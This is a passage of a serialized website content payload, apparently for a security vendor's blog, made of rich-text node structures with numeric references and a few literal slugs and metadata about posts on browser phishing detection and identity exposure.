912],{"nodeType":173,"value":1472,"marks":198913,"data":198915},[198914],{"type":194},{},{"nodeType":173,"value":1477,"marks":198917,"data":198918},[],{},{"nodeType":312,"data":198920,"content":198923},{"target":198921},{"sys":198922},{"id":98333,"type":317,"linkType":318},[],{"nodeType":178,"data":198925,"content":198926},{},[198927],{"nodeType":173,"value":37,"marks":198928,"data":198929},[],{},{"items":198931},[198932,198934],{"sys":198933,"name":509},{"id":508},{"sys":198935,"name":505},{"id":504},{"items":198937},[198938],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":198939},{"url":1496},{"__typename":1528,"sys":198941,"content":198942,"title":184068,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":199619,"authorsCollection":199625},{"id":183305},{"json":198943},{"nodeType":165,"data":198944,"content":198945},{},[198946,198951,198957,198999,199005,199011,199024,199030,199036,199105,199111,199116,199122,199128,199141,199147,199153,199173,199193,199198,199215,199221,199227,199254,199260,199266,199271,199288,199294,199300,199306,199312,199317,199334,199340,199346,199352,199358,199363,199380,199386,199392,199397,199414,199420,199426,199432,199474,199480,199541,199554,199559,199565,199571,199577,199583,199598,199604],{"nodeType":312,"data":198947,"content":198950},{"target":198948},{"sys":198949},{"id":183314,"type":317,"linkType":318},[],{"nodeType":178,"data":198952,"content":198953},{},[198954],{"nodeType":173,"value":183320,"marks":198955,"data":198956},[],{},{"nodeType":178,"data":198958,"content":198959},{},[198960,198963,198969,198972,198978,198981,198987,198990,198996],{"nodeType":173,"value":183327,"marks":198961,"data":198962},[],{},{"nodeType":186,"data":198964,"content":198965},{"uri":183332},[198966],{"nodeType":173,"value":183335,"marks":198967,"data":198968},[],{},{"nodeType":173,"value":3107,"marks":198970,"data":198971},[],{},{"nodeType":186,"data":198973,"content":198974},{"uri":183343},[198975],{"nodeType":173,"value":183346,"marks":198976,"data":198977},[],{},{"nodeType":173,"value":3107,"marks":198979,"data":198980},[],{},{"nodeType":186,"data":198982,"content":198983},{"uri":1297},[198984],{"nodeType":173,"value":183356,"marks":198985,"data":198986},[],{},{"nodeType":173,"value":3107,"marks":198988,"data":198989},[],{},{"nodeType":186,"data":198991,"content":198992},{"uri":183364},[198993],{"nodeType":173,"value":183367,"marks":198994,"data":198995},[],{},{"nodeType":173,"value":183371,"marks":198997,"data":198998},[],{},{"nodeType":178,"data":199000,"content":199001},{},[199002],{"nodeType":173,"value":183378,"marks":199003,"data":199004},[],{},{"nodeType":178,"data":199006,"content":199007},{},[199008],{"nodeType":173,"value":183385,"marks":199009,"data":199010},[],{},{"nodeType":178,"data":199012,"content":199013},{},[199014,199017,199021],{"nodeType":173,"value":183392,"marks":199015,"data":199016},[],{},{"nodeType":173,"value":183396,"marks":199018,"data":199020},[199019],{"type":370},{},{"nodeType":173,"value":1477,"marks":199022,"data":199023},[],{},{"nodeType":178,"data":199025,"content":199026},{},[199027],{"nodeType":173,"value":183407,"marks":199028,"data":199029},[],{},{"nodeType":178,"data":199031,"content":199032},{},[199033],{"nodeType":173,"value":183414,"marks":199034,"data":199035},[],{},{"nodeType":250,"data":199037,"content":199038},{},[199039,199064],{"nodeType":254,"data":199040,"content":199041},{},[199042],{"nodeType":178,"data":199043,"content":199044},{},[199045,199049,199052,199061],{"nodeType":173,"value":183427,"marks":199046,"data":199048},[199047],{"type":370},{},{"nodeType":173,"value":183432,"marks":199050,"data":199051},[],{},{"nodeType":1698,"data":199053,"content":199056},{"target":199054},{"sys":199055},{"id":183439,"type":317,"linkType":318},[199057],{"nodeType":173,"value":18649,"marks":199058,"data":199060},[199059],{"type":370},{},{"nodeType":173,"value":183446,"marks":199062,"data":199063},[],{},{"nodeType":254,"data":199065,"content":199066},{},[199067],{"nodeType":178,"data":199068,"content":199069},{},[199070,199074,199077,199083,199086,199092,199095,199102],{"nodeType":173,"value":183456,"marks":199071,"data":199073},[199072],{"type":370},{},{"nodeType":173,"value":183461,"marks":199075,"data":199076},[],{},{"nodeType":186,"data":199078,"content":199079},{"uri":183466},[199080],{"nodeType":173,"value":183469,"marks":199081,"data":199082},[],{},{"nodeType":173,"value":2936,"marks":199084,"data":199085},[],{},{"nodeType":186,"data":199087,"content":199088},{"uri":114007},[199089],{"nodeType":173,"value":183479,"marks":199090,"data":199091},[],{},{"nodeType":173,"value":183483,"marks":199093,"data":199094},[],{},{"nodeType":186,"data":199096,"content":199097},{"uri":183488},[199098],{"nodeType":173,"value":2718,"marks":199099,"data":199101},[199100],{"type":370},{},{"nodeType":173,"value":183495,"marks":199103,"data":199104},[],{},{"nodeType":178,"data":199106,"content":199107},{},[199108],{"nodeType":173,"value":183502,"marks":199109,"data":199110},[],{},{"nodeType":312,"data":199112,"content":199115},{"target":199113},{"sys":199114},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":199117,"content":199118},{},[199119],{"nodeType":173,"value":183514,"marks":199120,"data":199121},[],{},{"nodeType":178,"data":199123,"content":199124},{},[199125],{"nodeType":173,"value":183521,"marks":199126,"data":199127},[],{},{"nodeType":178,"data":199129,"content":199130},{},[199131,199134,199138],{"nodeType":173,"value":183528,"marks":199132,"data":199133},[],{},{"nodeType":173,"value":18649,"marks":199135,"data":199137},[199136],{"type":370},{},{"nodeType":173,"value":183536,"marks":199139,"data":199140},[],{},{"nodeType":178,"data":199142,"content":199143},{},[199144],{"nodeType":173,"value":183543,"marks":199145,"data":199146},[],{},{"nodeType":235,"data":199148,"content":199149},{},[199150],{"nodeType":173,"value":24345,"marks":199151,"data":199152},[],{},{"nodeType":178,"data":199154,"content":199155},{},[199156,199159,199163,199166,199170],{"nodeType":173,"value":183556,"marks":199157,"data":199158},[],{},{"nodeType":173,"value":183560,"marks":199160,"data":199162},[199161],{"type":370},{},{"nodeType":173,"value":933,"marks":199164,"data":199165},[],{},{"nodeType":173,"value":183568,"marks":199167,"data":199169},[199168],{"type":370},{},{"nodeType":173,"value":1477,"marks":199171,"data":199172},[],{},{"nodeType":178,"data":199174,"content":199175},{},[199176,199179,199183,199186,199190],{"nodeType":173,"value":183579,"marks":199177,"data":199178},[],{},{"nodeType":173,"value":2740,"marks":199180,"data":199182},[199181],{"type":370},{},{"nodeType":173,"value":1464,"marks":199184,"data":199185},[],{},{"nodeType":173,"value":2748,"marks":199187,"data":199189},[199188],{"type":370},{},{"nodeType":173,"value":183594,"marks":199191,"data":199192},[],{},{"nodeType":312,"data":199194,"content":199197},{"target":199195},{"sys":199196},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":199199,"content":199200},{},[199201,199204,199212],{"nodeType":173,"value":183606,"marks":199202,"data":199203},[],{},{"nodeType":1698,"data":199205,"content":199208},{"target":199206},{"sys":199207},{"id":2148,"type":317,"linkType":318},[199209],{"nodeType":173,"value":65996,"marks":199210,"data":199211},[],{},{"nodeType":173,"value":37,"marks":199213,"data":199214},[],{},{"nodeType":235,"data":199216,"content":199217},{},[199218],{"nodeType":173,"value":125683,"marks":199219,"data":199220},[],{},{"nodeType":178,"data":199222,"content":199223},{},[199224],{"nodeType":173,"value":183630,"marks":199225,"data":199226},[],{},{"nodeType":178,"data":199228,"content":199229},{},[199230,199233,199237,199240,199244,199247,199251],{"nodeType":173,"value":183637,"marks":199231,"data":199232},[],{},{"nodeType":173,"value":2740,"marks":199234,"data":199236},[199235],{"type":370},{},{"nodeType":173,"value":1464,"marks":199238,"data":199239},[],{},{"nodeType":173,"value":2748,"marks":199241,"data":199243},[199242],{"type":370},{},{"nodeType":173,"value":183652,"marks":199245,"data":199246},[],{},{"nodeType":173,"value":2701,"marks":199248,"data":199250},[199249],{"type":370},{},{"nodeType":173,"value":183660,"marks":199252,"data":199253},[],{},{"nodeType":178,"data":199255,"content":199256},{},[199257],{"nodeType":173,"value":183667,"marks":199258,"data":199259},[],{},{"nodeType":178,"data":199261,"content":199262},{},[199263],{"nodeType":173,"value":183674,"marks":199264,"data":199265},[],{},{"nodeType":312,"data":199267,"content":199270},{"target":199268},{"sys":199269},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":199272,"content":199273},{},[199274,199277,199285],{"nodeType":173,"value":183606,"marks":199275,"data":199276},[],{},{"nodeType":1698,"data":199278,"content":199281},{"target":199279},{"sys":199280},{"id":2405,"type":317,"linkType":318},[199282],{"nodeType":173,"value":125683,"marks":199283,"data":199284},[],{},{"nodeType":173,"value":37,"marks":199286,"data":199287},[],{},{"nodeType":235,"data":199289,"content":199290},{},[199291],{"nodeType":173,"value":157048,"marks":199292,"data":199293},[],{},{"nodeType":178,"data":199295,"content":199296},{},[199297],{"nodeType":173,"value":183710,"marks":199298,"data":199299},[],{},{"nodeType":178,"data":199301,"content":199302},{},[199303],{"nodeType":173,"value":183717,"marks":199304,"data":199305},[],{},{"nodeType":178,"data":199307,"content":199308},{},[199309],{"nodeType":173,"value":183724,"marks":199310,"data":199311},[],{},{"nodeType":312,"data":199313,"content":199316},{"target":199314},{"sys":199315},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":199318,"content":199319},{},[199320,199323,199331],{"nodeType":173,"value":183606,"marks":199321,"data":199322},[],{},{"nodeType":1698,"data":199324,"content":199327},{"target":199325},{"sys":199326},{"id":183743,"type":317,"linkType":318},[199328],{"nodeType":173,"value":157048,"marks":199329,"data":199330},[],{},{"nodeType":173,"value":37,"marks":199332,"data":199333},[],{},{"nodeType":235,"data":199335,"content":199336},{},[199337],{"nodeType":173,"value":183755,"marks":199338,"data":199339},[],{},{"nodeType":178,"data":199341,"content":199342},{},[199343],{"nodeType":173,"value":183762,"marks":199344,"data":199345},[],{},{"nodeType":178,"data":199347,"content":199348},{},[199349],{"nodeType":173,"value":183769,"marks":199350,"data":199351},[],{},{"nodeType":178,"data":199353,"content":199354},{},[199355],{"nodeType":173,"value":183776,"marks":199356,"data":199357},[],{},{"nodeType":312,"data":199359,"content":199362},{"target":199360},{"sys":199361},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":199364,"content":199365},{},[199366,199369,199377],{"nodeType":173,"value":183606,"marks":199367,"data":199368},[],{},{"nodeType":1698,"data":199370,"content":199373},{"target":199371},{"sys":199372},{"id":114256,"type":317,"linkType":318},[199374],{"nodeType":173,"value":114259,"marks":199375,"data":199376},[],{},{"nodeType":173,"value":37,"marks":199378,"data":199379},[],{},{"nodeType":235,"data":199381,"content":199382},{},[199383],{"nodeType":173,"value":2631,"marks":199384,"data":199385},[],{},{"nodeType":178,"data":199387,"content":199388},{},[199389],{"nodeType":173,"value":183812,"marks":199390,"data":199391},[],{},{"nodeType":312,"data":199393,"content":199396},{"target":199394},{"sys":199395},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":199398,"content":199399},{},[199400,199403,199411],{"nodeType":173,"value":183606,"marks":199401,"data":199402},[],{},{"nodeType":1698,"data":199404,"content":199407},{"target":199405},{"sys":199406},{"id":2466,"type":317,"linkType":318},[199408],{"nodeType":173,"value":126474,"marks":199409,"data":199410},[],{},{"nodeType":173,"value":37,"marks":199412,"data":199413},[],{},{"nodeType":169,"data":199415,"content":199416},{},[199417],{"nodeType":173,"value":183842,"marks":199418,"data":199419},[],{},{"nodeType":178,"data":199421,"content":199422},{},[199423],{"nodeType":173,"value":183849,"marks":199424,"data":199425},[],{},{"nodeType":178,"data":199427,"content":199428},{},[199429],{"nodeType":173,"value":183856,"marks":199430,"data":199431},[],{},{"nodeType":250,"data":199433,"content":199434},{},[199435,199448,199461],{"nodeType":254,"data":199436,"content":199437},{},[199438],{"nodeType":178,"data":199439,"content":199440},{},[199441,199445],{"nodeType":173,"value":157359,"marks":199442,"data":199444},[199443],{"type":370},{},{"nodeType":173,"value":157364,"marks":199446,"data":199447},[],{},{"nodeType":254,"data":199449,"content":199450},{},[199451],{"nodeType":178,"data":199452,"content":199453},{},[199454,199458],{"nodeType":173,"value":157374,"marks":199455,"data":199457},[199456],{"type":370},{},{"nodeType":173,"value":157379,"marks":199459,"data":199460},[],{},{"nodeType":254,"data":199462,"content":199463},{},[199464],{"nodeType":178,"data":199465,"content":199466},{},[199467,199471],{"nodeType":173,"value":157389,"marks":199468,"data":199470},[199469],{"type":370},{},{"nodeType":173,"value":157394,"marks":199472,"data":199473},[],{},{"nodeType":178,"data":199475,"content":199476},{},[199477],{"nodeType":173,"value":183905,"marks":199478,"data":199479},[],{},{"nodeType":250,"data":199481,"content":199482},{},[199483,199499,199515,199528],{"nodeType":254,"data":199484,"content":199485},{},[199486],{"nodeType":178,"data":199487,"content":199488},{},[199489,199492,199496],{"nodeType":173,"value":183918,"marks":199490,"data":199491},[],{},{"nodeType":173,"value":183922,"marks":199493,"data":199495},[199494],{"type":370},{},{"nodeType":173,"value":157428,"marks":199497,"data":199498},[],{},{"nodeType":254,"data":199500,"content":199501},{},[199502],{"nodeType":178,"data":199503,"content":199504},{},[199505,199508,199512],{"nodeType":173,"value":183936,"marks":199506,"data":199507},[],{},{"nodeType":173,"value":183940,"marks":199509,"data":199511},[199510],{"type":370},{},{"nodeType":173,"value":183945,"marks":199513,"data":199514},[],{},{"nodeType":254,"data":199516,"content":199517},{},[199518],{"nodeType":178,"data":199519,"content":199520},{},[199521,199525],{"nodeType":173,"value":183955,"marks":199522,"data":199524},[199523],{"type":370},{},{"nodeType":173,"value":183960,"marks":199526,"data":199527},[],{},{"nodeType":254,"data":199529,"content":199530},{},[199531],{"nodeType":178,"data":199532,"content":199533},{},[199534,199538],{"nodeType":173,"value":183970,"marks":199535,"data":199537},[199536],{"type":370},{},{"nodeType":173,"value":183975,"marks":199539,"data":199540},[],{},{"nodeType":178,"data":199542,"content":199543},{},[199544,199547,199551],{"nodeType":173,"value":183982,"marks":199545,"data":199546},[],{},{"nodeType":173,"value":2718,"marks":199548,"data":199550},[199549],{"type":370},{},{"nodeType":173,"value":183990,"marks":199552,"data":199553},[],{},{"nodeType":312,"data":199555,"content":199558},{"target":199556},{"sys":199557},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":199560,"content":199561},{},[199562],{"nodeType":173,"value":184003,"marks":199563,"data":199564},[],{},{"nodeType":169,"data":199566,"content":199567},{},[199568],{"nodeType":173,"value":184010,"marks":199569,"data":199570},[],{},{"nodeType":178,"data":199572,"content":199573},{},[199574],{"nodeType":173,"value":184017,"marks":199575,"data":199576},[],{},{"nodeType":178,"data":199578,"content":199579},{},[199580],{"nodeType":173,"value":184024,"marks":199581,"data":199582},[],{},{"nodeType":178,"data":199584,"content":199585},{},[199586,199589,199595],{"nodeType":173,"value":184031,"marks":199587,"data":199588},[],{},{"nodeType":186,"data":199590,"content":199591},{"uri":114007},[199592],{"nodeType":173,"value":184038,"marks":199593,"data":199594},[],{},{"nodeType":173,"value":184042,"marks":199596,"data":199597},[],{},{"nodeType":169,"data":199599,"content":199600},{},[199601],{"nodeType":173,"value":71801,"marks":199602,"data":199603},[],{},{"nodeType":178,"data":199605,"content":199606},{},[199607,199610,199616],{"nodeType":173,"value":184055,"marks":199608,"data":199609},[],{},{"nodeType":186,"data":199611,"content":199612},{"uri":114457},[199613],{"nodeType":173,"value":88194,"marks":199614,"data":199615},[],{},{"nodeType":173,"value":184065,"marks":199617,"data":199618},[],{},{"items":199620},[199621,199623],{"sys":199622,"name":18399},{"id":18398},{"sys":199624,"name":509},{"id":508},{"items":199626},[199627],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":199628},{"url":2911},{"__typename":1528,"sys":199630,"content":199631,"title":69761,"synopsis":69762,"hashTags":118,"publishedDate":69763,"slug":69764,"tagsCollection":200037,"authorsCollection":200043},{"id":69294},{"json":199632},{"nodeType":165,"data":199633,"content":199634},{},[199635,199642,199648,199654,199659,199665,199670,199676,199682,199685,199692,199698,199704,199725,199731,199734,199741,199754,199759,199765,199770,199776,199782,199785,199792,199808,199813,199819,199824,199827,199834,199850,199855,199861,199866,199882,199887,199892,199895,199902,199908,199914,199919,199922,199929,199935,199941,199944,199951,199957,199963,199968,199974,200004,200009,200016,200022],{"nodeType":169,"data":199636,"content":199637},{},[199638],{"nodeType":173,"value":24096,"marks":199639,"data":199641},[199640],{"type":370},{},{"nodeType":178,"data":199643,"content":199644},{},[199645],{"nodeType":173,"value":69310,"marks":199646,"data":199647},[],{},{"nodeType":178,"data":199649,"content":199650},{},[199651],{"nodeType":173,"value":69317,"marks":199652,"data":199653},[],{},{"nodeType":312,"data":199655,"content":199658},{"target":199656},{"sys":199657},{"id":63196,"type":317,"linkType":318},[],{"nodeType":178,"data":199660,"content":199661},{},[199662],{"nodeType":173,"value":69329,"marks":199663,"data":199664},[],{},{"nodeType":312,"data":199666,"content":199669},{"target":199667},{"sys":199668},{"id":69336,"type":317,"linkType":318},[],{"nodeType":178,"data":199671,"content":199672},{},[199673],{"nodeType":173,"value":69342,"marks":199674,"data":199675},[],{},{"nodeType":178,"data":199677,"content":199678},{},[199679],{"nodeType":173,"value":69349,"marks":199680,"data":199681},[],{},{"nodeType":231,"data":199683,"content":199684},{},[],{"nodeType":169,"data":199686,"content":199687},{},[199688],{"nodeType":173,"value":69359,"marks":199689,"data":199691},[199690],{"type":370},{},{"nodeType":178,"data":199693,"content":199694},{},[199695],{"nodeType":173,"value":69367,"marks":199696,"data":199697},[],{},{"nodeType":178,"data":199699,"content":199700},{},[199701],{"nodeType":173,"value":69374,"marks":199702,"data":199703},[],{},{"nodeType":250,"data":199705,"content":199706},{},[199707,199716],{"nodeType":254,"data":199708,"content":199709},{},[199710],{"nodeType":178,"data":199711,"content":199712},{},[199713],{"nodeType":173,"value":69387,"marks":199714,"data":199715},[],{},{"nodeType":254,"data":199717,"content":199718},{},[199719],{"nodeType":178,"data":199720,"content":199721},{},[199722],{"nodeType":173,"value":69397,"marks":199723,"data":199724},[],{},{"nodeType":178,"data":199726,"content":199727},{},[199728],{"nodeType":173,"value":69404,"marks":199729,"data":199730},[],{},{"nodeType":231,"data":199732,"content":199733},{},[],{"nodeType":169,"data":199735,"content":199736},{},[199737],{"nodeType":173,"value":69414,"marks":199738,"data":199740},[199739],{"type":370},{},{"nodeType":178,"data":199742,"content":199743},{},[199744,199747,199751],{"nodeType":173,"value":69422,"marks":199745,"data":199746},[],{},{"nodeType":173,"value":8046,"marks":199748,"data":199750},[199749],{"type":370},{},{"nodeType":173,"value":69430,"marks":199752,"data":199753},[],{},{"nodeType":312,"data":199755,"content":199758},{"target":199756},{"sys":199757},{"id":69437,"type":317,"linkType":318},[],{"nodeType":178,"data":199760,"content":199761},{},[199762],{"nodeType":173,"value":69443,"marks":199763,"data":199764},[],{},{"nodeType":312,"data":199766,"content":199769},{"target":199767},{"sys":199768},{"id":69450,"type":317,"linkType":318},[],{"nodeType":178,"data":199771,"content":199772},{},[199773],{"nodeType":173,"value":69456,"marks":199774,"data":199775},[],{},{"nodeType":178,"data":199777,"content":199778},{},[199779],{"nodeType":173,"value":69463,"marks":199780,"data":199781},[],{},{"nodeType":231,"data":199783,"content":199784},{},[],{"nodeType":235,"data":199786,"content":199787},{},[199788],{"nodeType":173,"value":69473,"marks":199789,"data":199791},[199790],{"type":370},{},{"nodeType":178,"data":199793,"content":199794},{},[199795,199798,199805],{"nodeType":173,"value":69481,"marks":199796,"data":199797},[],{},{"nodeType":186,"data":199799,"content":199800},{"uri":61655},[199801],{"nodeType":173,"value":69488,"marks":199802,"data":199804},[199803],{"type":194},{},{"nodeType":173,"value":69493,"marks":199806,"data":199807},[],{},{"nodeType":312,"data":199809,"content":199812},{"target":199810},{"sys":199811},{"id":69500,"type":317,"linkType":318},[],{"nodeType":178,"data":199814,"content":199815},{},[199816],{"nodeType":173,"value":69506,"marks":199817,"data":199818},[],{},{"nodeType":312,"data":199820,"content":199823},{"target":199821},{"sys":199822},{"id":69513,"type":317,"linkType":318},[],{"nodeType":231,"data":199825,"content":199826},{},[],{"nodeType":169,"data":199828,"content":199829},{},[199830],{"nodeType":173,"value":69522,"marks":199831,"data":199833},[199832],{"type":370},{},{"nodeType":178,"data":199835,"content":199836},{},[199837,199840,199847],{"nodeType":173,"value":69530,"marks":199838,"data":199839},[],{},{"nodeType":186,"data":199841,"content":199842},{"uri":69535},[199843],{"nodeType":173,"value":69538,"marks":199844,"data":199846},[199845],{"type":194},{},{"nodeType":173,"value":69543,"marks":199848,"data":199849},[],{},{"nodeType":312,"data":199851,"content":199854},{"target":199852},{"sys":199853},{"id":69550,"type":317,"linkType":318},[],{"nodeType":178,"data":199856,"content":199857},{},[199858],{"nodeType":173,"value":69556,"marks":199859,"data":199860},[],{},{"nodeType":312,"data":199862,"content":199865},{"target":199863},{"sys":199864},{"id":69563,"type":317,"linkType":318},[],{"nodeType":178,"data":199867,"content":199868},{},[199869,199872,199879],{"nodeType":173,"value":69569,"marks":199870,"data":199871},[],{},{"nodeType":186,"data":199873,"content":199874},{"uri":69574},[199875],{"nodeType":173,"value":69577,"marks":199876,"data":199878},[199877],{"type":194},{},{"nodeType":173,"value":69582,"marks":199880,"data":199881},[],{},{"nodeType":312,"data":199883,"content":199886},{"target":199884},{"sys":199885},{"id":69589,"type":317,"linkType":318},[],{"nodeType":312,"data":199888,"content":199891},{"target":199889},{"sys":199890},{"id":69595,"type":317,"linkType":318},[],{"nodeType":231,"data":199893,"content":199894},{},[],{"nodeType":169,"data":199896,"content":199897},{},[199898],{"nodeType":173,"value":69604,"marks":199899,"data":199901},[199900],{"type":370},{},{"nodeType":178,"data":199903,"content":199904},{},[199905],{"nodeType":173,"value":69612,"marks":199906,"data":199907},[],{},{"nodeType":178,"data":199909,"content":199910},{},[199911],{"nodeType":173,"value":69619,"marks":199912,"data":199913},[],{},{"nodeType":312,"data":199915,"content":199918},{"target":199916},{"sys":199917},{"id":69626,"type":317,"linkType":318},[],{"nodeType":231,"data":199920,"content":199921},{},[],{"nodeType":169,"data":199923,"content":199924},{},[199925],{"nodeType":173,"value":69635,"marks":199926,"data":199928},[199927],{"type":370},{},{"nodeType":178,"data":199930,"content":199931},{},[199932],{"nodeType":173,"value":69643,"marks":199933,"data":199934},[],{},{"nodeType":178,"data":199936,"content":199937},{},[199938],{"nodeType":173,"value":69650,"marks":199939,"data":199940},[],{},{"nodeType":231,"data":199942,"content":199943},{},[],{"nodeType":169,"data":199945,"content":199946},{},[199947],{"nodeType":173,"value":69660,"marks":199948,"data":199950},[199949],{"type":370},{},{"nodeType":178,"data":199952,"content":199953},{},[199954],{"nodeType":173,"value":69668,"marks":199955,"data":199956},[],{},{"nodeType":178,"data":199958,"content":199959},{},[199960],{"nodeType":173,"value":69675,"marks":199961,"data":199962},[],{},{"nodeType":312,"data":199964,"content":199967},{"target":199965},{"sys":199966},{"id":69682,"type":317,"linkType":318},[],{"nodeType":178,"data":199969,"content":199970},{},[199971],{"nodeType":173,"value":69688,"marks":199972,"data":199973},[],{},{"nodeType":250,"data":199975,"content":199976},{},[199977,199986,199995],{"nodeType":254,"data":199978,"content":199979},{},[199980],{"nodeType":178,"data":199981,"content":199982},{},[199983],{"nodeType":173,"value":69701,"marks":199984,"data":199985},[],{},{"nodeType":254,"data":199987,"content":199988},{},[199989],{"nodeType":178,"data":199990,"content":199991},{},[199992],{"nodeType":173,"value":69711,"marks":199993,"data":199994},[],{},{"nodeType":254,"data":199996,"content":199997},{},[199998],{"nodeType":178,"data":199999,"content":200000},{},[200001],{"nodeType":173,"value":69721,"marks":200002,"data":200003},[],{},{"nodeType":312,"data":200005,"content":200008},{"target":200006},{"sys":200007},{"id":69728,"type":317,"linkType":318},[],{"nodeType":235,"data":200010,"content":200011},{},[200012],{"nodeType":173,"value":461,"marks":200013,"data":200015},[200014],{"type":370},{},{"nodeType":178,"data":200017,"content":200018},{},[200019],{"nodeType":173,"value":69741,"marks":200020,"data":200021},[],{},{"nodeType":178,"data":200023,"content":200024},{},[200025,200028,200034],{"nodeType":173,"value":69748,"marks":200026,"data":200027},[],{},{"nodeType":186,"data":200029,"content":200030},{"uri":1469},[200031],{"nodeType":173,"value":476,"marks":200032,"data":200033},[],{},{"nodeType":173,"value":69758,"marks":200035,"data":200036},[],{},{"items":200038},[200039,200041],{"sys":200040,"name":505},{"id":504},{"sys":200042,"name":509},{"id":508},{"items":200044},[200045],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":200046},{"url":8615},"content:blog:detecting-and-blocking-phishing-attacks-in-the-browser.json","blog/detecting-and-blocking-phishing-attacks-in-the-browser.json","blog/detecting-and-blocking-phishing-attacks-in-the-browser",{"_path":200051,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":200052,"summary":200054,"title":183003,"subtitle":118,"metaTitle":200065,"synopsis":183004,"hashTags":118,"publishedDate":183005,"slug":183006,"ogImage":200066,"tagsCollection":200068,"relatedBlogPostsCollection":200074,"authorsCollection":202544,"content":202548,"_id":202824,"_type":5439,"_source":5440,"_file":202825,"_stem":202826,"_extension":5439},"/blog/how-many-vulnerable-identities-do-you-have",{"id":182701,"publishedAt":200053},"2024-10-15T09:39:27.512Z",{"json":200055},{"data":200056,"content":200057,"nodeType":165},{},[200058],{"data":200059,"content":200060,"nodeType":178},{},[200061],{"data":200062,"marks":200063,"value":200064,"nodeType":173},{},[],"Answering key questions about your exposure to identity threats using Push data.","Using Push data to quantify identity vulnerabilities",{"url":200067},"https://images.ctfassets.net/y1cdw1ablpvd/7v4Zx9Ac2V6txIpDbp0WU4/ae2916d0cd69f4f7e47bf0fc1cff07d3/Sankey_chart_-_cropped_-_higher_res__1_.png",{"items":200069},[200070,200072],{"sys":200071,"name":505},{"id":504},{"sys":200073,"name":509},{"id":508},{"items":200075},[200076,201069,202126],{"__typename":1528,"sys":200077,"content":200078,"title":168014,"synopsis":175419,"hashTags":118,"publishedDate":175420,"slug":168015,"tagsCollection":201059,"authorsCollection":201065},{"id":148636},{"json":200079},{"nodeType":165,"data":200080,"content":200081},{},[200082,200108,200118,200131,200137,200143,200146,200152,200158,200274,200280,200286,200362,200368,200374,200422,200428,200449,200495,200498,200504,200520,200536,200542,200558,200564,200574,200577,200583,200589,200631,200637,200643,200659,200662,200668,200674,200680,200696,200702,200708,200714,200730,200736,200742,200748,200754,200770,200776,200782,200788,200794,200819,200824,200827,200833,200839,200844,200850,200856,200877,200883,200889,200928,200941,200957,200962,200968,200974,200980,201006,201042,201048,201053],{"nodeType":178,"data":200083,"content":200084},{},[200085,200088,200095,200098,200105],{"nodeType":173,"value":174290,"marks":200086,"data":200087},[],{},{"nodeType":186,"data":200089,"content":200090},{"uri":3999},[200091],{"nodeType":173,"value":174297,"marks":200092,"data":200094},[200093],{"type":194},{},{"nodeType":173,"value":174302,"marks":200096,"data":200097},[],{},{"nodeType":186,"data":200099,"content":200100},{"uri":74621},[200101],{"nodeType":173,"value":74624,"marks":200102,"data":200104},[200103],{"type":194},{},{"nodeType":173,"value":174313,"marks":200106,"data":200107},[],{},{"nodeType":178,"data":200109,"content":200110},{},[200111,200114],{"nodeType":173,"value":174320,"marks":200112,"data":200113},[],{},{"nodeType":173,"value":174324,"marks":200115,"data":200117},[200116],{"type":370},{},{"nodeType":178,"data":200119,"content":200120},{},[200121,200124,200128],{"nodeType":173,"value":174332,"marks":200122,"data":200123},[],{},{"nodeType":173,"value":174336,"marks":200125,"data":200127},[200126],{"type":370},{},{"nodeType":173,"value":174341,"marks":200129,"data":200130},[],{},{"nodeType":178,"data":200132,"content":200133},{},[200134],{"nodeType":173,"value":174348,"marks":200135,"data":200136},[],{},{"nodeType":178,"data":200138,"content":200139},{},[200140],{"nodeType":173,"value":174355,"marks":200141,"data":200142},[],{},{"nodeType":231,"data":200144,"content":200145},{},[],{"nodeType":169,"data":200147,"content":200148},{},[200149],{"nodeType":173,"value":174365,"marks":200150,"data":200151},[],{},{"nodeType":178,"data":200153,"content":200154},{},[200155],{"nodeType":173,"value":174372,"marks":200156,"data":200157},[],{},{"nodeType":250,"data":200159,"content":200160},{},[200161,200180,200199,200218,200237,200255],{"nodeType":254,"data":200162,"content":200163},{},[200164],{"nodeType":178,"data":200165,"content":200166},{},[200167,200170,200177],{"nodeType":173,"value":174385,"marks":200168,"data":200169},[],{},{"nodeType":186,"data":200171,"content":200172},{"uri":174390},[200173],{"nodeType":173,"value":174393,"marks":200174,"data":200176},[200175],{"type":194},{},{"nodeType":173,"value":53584,"marks":200178,"data":200179},[],{},{"nodeType":254,"data":200181,"content":200182},{},[200183],{"nodeType":178,"data":200184,"content":200185},{},[200186,200189,200196],{"nodeType":173,"value":150381,"marks":200187,"data":200188},[],{},{"nodeType":186,"data":200190,"content":200191},{"uri":150386},[200192],{"nodeType":173,"value":150389,"marks":200193,"data":200195},[200194],{"type":194},{},{"nodeType":173,"value":53584,"marks":200197,"data":200198},[],{},{"nodeType":254,"data":200200,"content":200201},{},[200202],{"nodeType":178,"data":200203,"content":200204},{},[200205,200208,200215],{"nodeType":173,"value":174426,"marks":200206,"data":200207},[],{},{"nodeType":186,"data":200209,"content":200210},{"uri":174431},[200211],{"nodeType":173,"value":1255,"marks":200212,"data":200214},[200213],{"type":194},{},{"nodeType":173,"value":60235,"marks":200216,"data":200217},[],{},{"nodeType":254,"data":200219,"content":200220},{},[200221],{"nodeType":178,"data":200222,"content":200223},{},[200224,200227,200234],{"nodeType":173,"value":174447,"marks":200225,"data":200226},[],{},{"nodeType":186,"data":200228,"content":200229},{"uri":125982},[200230],{"nodeType":173,"value":1300,"marks":200231,"data":200233},[200232],{"type":194},{},{"nodeType":173,"value":53584,"marks":200235,"data":200236},[],{},{"nodeType":254,"data":200238,"content":200239},{},[200240],{"nodeType":178,"data":200241,"content":200242},{},[200243,200246,200252],{"nodeType":173,"value":174467,"marks":200244,"data":200245},[],{},{"nodeType":186,"data":200247,"content":200248},{"uri":150408},[200249],{"nodeType":173,"value":150411,"marks":200250,"data":200251},[],{},{"nod